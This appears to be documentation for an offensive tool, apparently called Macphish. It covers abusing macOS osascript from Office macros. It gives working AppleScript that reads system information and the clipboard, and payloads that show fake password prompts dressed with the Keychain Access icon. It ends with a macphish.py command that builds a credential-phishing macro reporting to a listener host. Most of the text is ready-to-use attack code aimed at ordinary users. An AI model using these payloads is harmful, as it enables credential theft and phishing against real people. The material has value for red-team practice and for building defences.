Osascript
Osascript is an utility installed in every Mac that executes applescript scripts. While system events are blocked , attackers still have full access to the dialog functions allowing them to create dialogs, input text boxes, buttons, obtain system information and read the system clipboard. Attackers can abuse this functionality to launch phishing attacks against users capturing their keystrokes and using network resources to exfiltrate the captured information.
We can access interesting system information with the command 'system info'.
return (system info)
{AppleScript version:"2.5", AppleScript Studio version:"1.5.3", system version:"10.11.6", short user name:"user", long user name:"user", user ID:501, user locale:"en_US", home directory:alias "a1b2c3:Users:user:", boot volume:"a1b2c3", computer name:"user", host name:"workstation-1", IPv4 address:"192.168.1.68", primary Ethernet address:"78:31:c1:c1:9c:0a", CPU type:"Intel x86-64h Haswell", CPU speed:2300, physical memory:16384}
We can also access the user's clipboard.
return (the clipboard)
We can attempt credential phishing with some help of osascript. For example, an Applescript payload to generate an input box that asks for credentials:
do shell script "/usr/bin/osascript -e 'display dialog \"eaea\" & return & return default answer \"\" with icon caution with hidden answer with title \"eaeaeaeaea\"'"
We can customize the icon used in the dialogs by setting the 'icon file':
do shell script "/usr/bin/osascript -e 'display dialog \"eaea\" & return & return default answer \"\" with icon file \"Applications:Utilities:Keychain Access.app:Contents:Resources:AppIcon.icns\" with hidden answer with title \"eaeaeaeaea\"'"
Macphish can generate an Office macro that works for versions 2011 and 2016 that implements this credential phishing attack.
$./macphish.py -lh <host> -m -a creds